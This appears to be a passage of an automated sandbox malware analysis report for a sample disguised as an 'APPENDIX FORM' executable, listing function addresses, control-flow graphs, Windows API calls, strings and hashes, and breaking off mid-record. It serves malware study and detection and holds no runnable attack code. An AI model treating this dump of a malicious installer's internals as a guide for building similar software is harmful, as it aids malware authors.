                                                                                                              • Opcode Fuzzy Hash: 2173a1222272c8fea1f402388a10c978ca0a8ff75f5850e8d405ccc6749e7504
                                                                                                              • Instruction Fuzzy Hash: A8116D71A00108BFDF219F90DE49EAB7B79EB54349F104176F906A00A0D7B49E51AF59
                                                                                                              Function 100016DA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 812 100016da-10001716 call 10001a86 816 10001827-10001829 812->816 817 1000171c-10001720 812->817 818 10001722-10001728 call 100021ce 817->818 819 10001729-10001736 call 10002218 817->819 818->819 824 10001766-1000176d 819->824 825 10001738-1000173d 819->825 826 1000178d-10001791 824->826 827 1000176f-1000178b call 100023d6 call 10001576 call 10001278 GlobalFree 824->827 828 10001758-1000175b 825->828 829 1000173f-10001740 825->829 832 10001793-100017cd call 10001576 call 100023d6 826->832 833 100017cf-100017d5 call 100023d6 826->833 853 100017d6-100017da 827->853 828->824 834 1000175d-1000175e call 10002ac3 828->834 830 10001742-10001743 829->830 831 10001748-10001749 call 10002808 829->831 837 10001750-10001756 call 100025a9 830->837 838 10001745-10001746 830->838 844 1000174e 831->844 832->853 833->853 847 10001763 834->847 852 10001765 837->852 838->824 838->831 844->847 847->852 852->824 856 10001817-1000181e 853->856 857 100017dc-100017ea call 1000239c 853->857 856->816 860 10001820-10001821 GlobalFree 856->860 862 10001802-10001809 857->862 863 100017ec-100017ef 857->863 860->816 862->856 865 1000180b-10001816 call 100014ff 862->865 863->862 864 100017f1-100017f9 863->864 864->862 866 100017fb-100017fc FreeLibrary 864->866 865->856 866->862
                                                                                                              APIs
                                                                                                                • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CED
                                                                                                                • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CF2
                                                                                                                • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CF7
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10001785
                                                                                                              • FreeLibrary.KERNEL32(?), ref: 100017FC
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10001821
                                                                                                                • Part of subcall function 100021CE: GlobalAlloc.KERNEL32(00000040,FFFFFF25), ref: 10002200
                                                                                                                • Part of subcall function 100025A9: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001756,00000000), ref: 1000261B
                                                                                                                • Part of subcall function 10001576: lstrcpyA.KERNEL32(00000000,?,00000000,100016B2,00000000), ref: 1000158F
                                                                                                                • Part of subcall function 100023D6: wsprintfA.USER32 ref: 1000243B
                                                                                                                • Part of subcall function 100023D6: GlobalFree.KERNEL32(?), ref: 100024F7
                                                                                                                • Part of subcall function 100023D6: GlobalFree.KERNEL32(00000000), ref: 10002520
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1834372877.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1834339228.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1834405696.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1834432896.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 1767494692-3916222277
                                                                                                              • Opcode ID: 8f546bcdbccf52204e4abd016d6570bc89ddc6d917656edff521bb3708f9dae6
                                                                                                              • Instruction ID: 31c192df4af0f094e7bae8beab1b8a4839dd106043f43e412ae8e076eabbacf1
                                                                                                              • Opcode Fuzzy Hash: 8f546bcdbccf52204e4abd016d6570bc89ddc6d917656edff521bb3708f9dae6
                                                                                                              • Instruction Fuzzy Hash: 3431AE758046059AFB41DF749CC6BDA37ECFF052D0F108425F909AA09EDFB499858BA0
                                                                                                              Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 869 401bb8-401bd0 call 4029e2 * 2 874 401bd2-401bd9 call 4029ff 869->874 875 401bdc-401be0 869->875 874->875 877 401be2-401be9 call 4029ff 875->877 878 401bec-401bf2 875->878 877->878 881 401bf4-401c08 call 4029e2 * 2 878->881 882 401c38-401c5e call 4029ff * 2 FindWindowExA 878->882 893 401c28-401c36 SendMessageA 881->893 894 401c0a-401c26 SendMessageTimeoutA 881->894 892 401c64 882->892 895 401c67-401c6a 892->895 893->892 894->895 896 401c70 895->896 897 402894-4028a3 895->897 896->897
                                                                                                              APIs
                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                                                                                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Timeout
                                                                                                              • String ID: !
                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                              • Opcode ID: bf1d3e3dad9acb3115c08623f9690363476153f89cea488026e82bb3f758518a
                                                                                                              • Instruction ID: 32dbfdbc90181073e3716ad927fe4118a64655002d51add2ca0d79efa18d1667
                                                                                                              • Opcode Fuzzy Hash: bf1d3e3dad9acb3115c08623f9690363476153f89cea488026e82bb3f758518a
                                                                                                              • Instruction Fuzzy Hash: B02181B1A44208BEEF45AFB4CD4AAAE7AB5EB40304F14457AF541B61D1D6B88940DB18
                                                                                                              Function 0040585E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00405CE0: lstrcpynA.KERNEL32(?,?,00000400,00403289,Centraleuropisk Setup,NSIS Error), ref: 00405CED
                                                                                                                • Part of subcall function 00405809: CharNextA.USER32(?,?,luggages.con,?,00405875,luggages.con,luggages.con,?,?,771B2EE0,004055C0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405817
                                                                                                                • Part of subcall function 00405809: CharNextA.USER32(00000000), ref: 0040581C
                                                                                                                • Part of subcall function 00405809: CharNextA.USER32(00000000), ref: 00405830
                                                                                                              • lstrlenA.KERNEL32(luggages.con,00000000,luggages.con,luggages.con,?,?,771B2EE0,004055C0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 004058B1
                                                                                                              • GetFileAttributesA.KERNELBASE(luggages.con,luggages.con,luggages.con,luggages.con,luggages.con,luggages.con,00000000,luggages.con,luggages.con,?,?,771B2EE0,004055C0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0), ref: 004058C1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                              • String ID: luggages.con
                                                                                                              • API String ID: 3248276644-617196232
                                                                                                              • Opcode ID: e143d0bff1d3a1e97625ef6ed67efd149ba2b082c8de35daf5e76a6337fb6798
                                                                                                              • Instruction ID: 2ece47ccb26b0c22bb62944128bc782dcc9e5394e0a4c06150887c330ad7e386
                                                                                                              • Opcode Fuzzy Hash: e143d0bff1d3a1e97625ef6ed67efd149ba2b082c8de35daf5e76a6337fb6798
                                                                                                              • Instruction Fuzzy Hash: D5F02823105D6122D62232371C49E9F2A45CD83314718813BFC60B22D2DA3CC863DD7E
                                                                                                              Function 00405493 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004214E8,Error launching installer), ref: 004054B8
                                                                                                              • CloseHandle.KERNEL32(?), ref: 004054C5
                                                                                                              Strings
                                                                                                              • Error launching installer, xrefs: 004054A6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                              • String ID: Error launching installer
                                                                                                              • API String ID: 3712363035-66219284
                                                                                                              • Opcode ID: 44df9076715bb7e151bebb2f5864405cbbd02c1cd51f3942059a2279cc9d8a17
                                                                                                              • Instruction ID: 7b633475fa2e13aa519e78ab65903730338a863422e7bcfa27920a6c3387955a
                                                                                                              • Opcode Fuzzy Hash: 44df9076715bb7e151bebb2f5864405cbbd02c1cd51f3942059a2279cc9d8a17
                                                                                                              • Instruction Fuzzy Hash: 55E0E674A00209ABDB10EFA4DD4596B7BBDEB10305B408531B914E2160D774D410CA79
                                                                                                              Function 004031E5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00405F4B: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031F1,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405FA3
                                                                                                                • Part of subcall function 00405F4B: CharNextA.USER32(?,?,?,00000000), ref: 00405FB0
                                                                                                                • Part of subcall function 00405F4B: CharNextA.USER32(?,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031F1,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405FB5
                                                                                                                • Part of subcall function 00405F4B: CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031F1,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405FC5
                                                                                                              • CreateDirectoryA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00403206
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                                                              • String ID: 1033$C:\Users\user~1\AppData\Local\Temp\
                                                                                                              • API String ID: 4115351271-3049706366
                                                                                                              • Opcode ID: f80f4c6bea085b934f07f01a50d8cef12395f9d7bebc9578094670fc86bd733e
                                                                                                              • Instruction ID: 1d184d1ad875a5c971663b26bd465f741c1c583330f8faa726a1fd3199eebd18
                                                                                                              • Opcode Fuzzy Hash: f80f4c6bea085b934f07f01a50d8cef12395f9d7bebc9578094670fc86bd733e
                                                                                                              • Instruction Fuzzy Hash: EED0922160AD3062D551362A7C0AFCF190C8F4636AF918077F804B50C65A6C6A8269FF
                                                                                                              Function 004066EF Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 23cb73ad5e10f4e344e57a815cb9849c44d7ebb0606a959d6cf4fd6ac0c83af7
                                                                                                              • Instruction ID: 57e40c2acefb0b34dc51ba14adea8f2dd467a51599ed72ebaeee0bf9bad7d858
                                                                                                              • Opcode Fuzzy Hash: 23cb73ad5e10f4e344e57a815cb9849c44d7ebb0606a959d6cf4fd6ac0c83af7
                                                                                                              • Instruction Fuzzy Hash: 9AA14171E00229CFDB28CFA8C8547ADBBB1FB44305F15816ED816BB281D7785A96DF44
                                                                                                              Function 004068F0 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8b3f6be63239c0cb837da51a3d9f2134ef1b14dc2e083ec86415700d1a1d3e6b
                                                                                                              • Instruction ID: 43f12e2563a4047fa425a185cdd3bc30ce3cfc84c0a70b15e8e3771f47715ab2
                                                                                                              • Opcode Fuzzy Hash: 8b3f6be63239c0cb837da51a3d9f2134ef1b14dc2e083ec86415700d1a1d3e6b
                                                                                                              • Instruction Fuzzy Hash: C3913070E00229CFDF28CF98C8547ADBBB1FB44305F15816AD816BB281D778AA96DF44
                                                                                                              Function 00406606 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d9fa1cb865db95249741f93cb8c753d7e4f9bb8adb072a23a7b5d4237c11c5eb
                                                                                                              • Instruction ID: 8348384c2088d0dca10fb2cfce14f15a8a06df42cb65cfce77c7d545600b327b
                                                                                                              • Opcode Fuzzy Hash: d9fa1cb865db95249741f93cb8c753d7e4f9bb8adb072a23a7b5d4237c11c5eb
                                                                                                              • Instruction Fuzzy Hash: 2F813771D04228CFDF24DFA8C8847ADBBB1FB45305F25816AD416BB281C7789996DF04
                                                                                                              Function 0040610B Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 179af5664f17e4f2403a1a693b6a24cb6119fcd0801561dfa3e1b49326d4cf15
                                                                                                              • Instruction ID: b0014496198728110a5296264d01e6ecaf8aeebecb777455980bb60694c24f35
                                                                                                              • Opcode Fuzzy Hash: 179af5664f17e4f2403a1a693b6a24cb6119fcd0801561dfa3e1b49326d4cf15
                                                                                                              • Instruction Fuzzy Hash: B5818771D00228CFDF24DFA8C8447ADBBB1FB44301F11816AD956BB281C7786A96DF44
                                                                                                              Function 00406559 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 21c63995844886ac2fe7fbd4dd860e07685d7144360ec0a582e920b02fde6c26
                                                                                                              • Instruction ID: ae8010f5f00a2a00aaab6ae45f29b4f91a62fe5ecd20e2395cd8f48d9039e886
                                                                                                              • Opcode Fuzzy Hash: 21c63995844886ac2fe7fbd4dd860e07685d7144360ec0a582e920b02fde6c26
                                                                                                              • Instruction Fuzzy Hash: 54711471E00229CFDF24DF98C8547ADBBB1FB44305F15806AD816BB281D7389996DF44
                                                                                                              Function 00406677 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
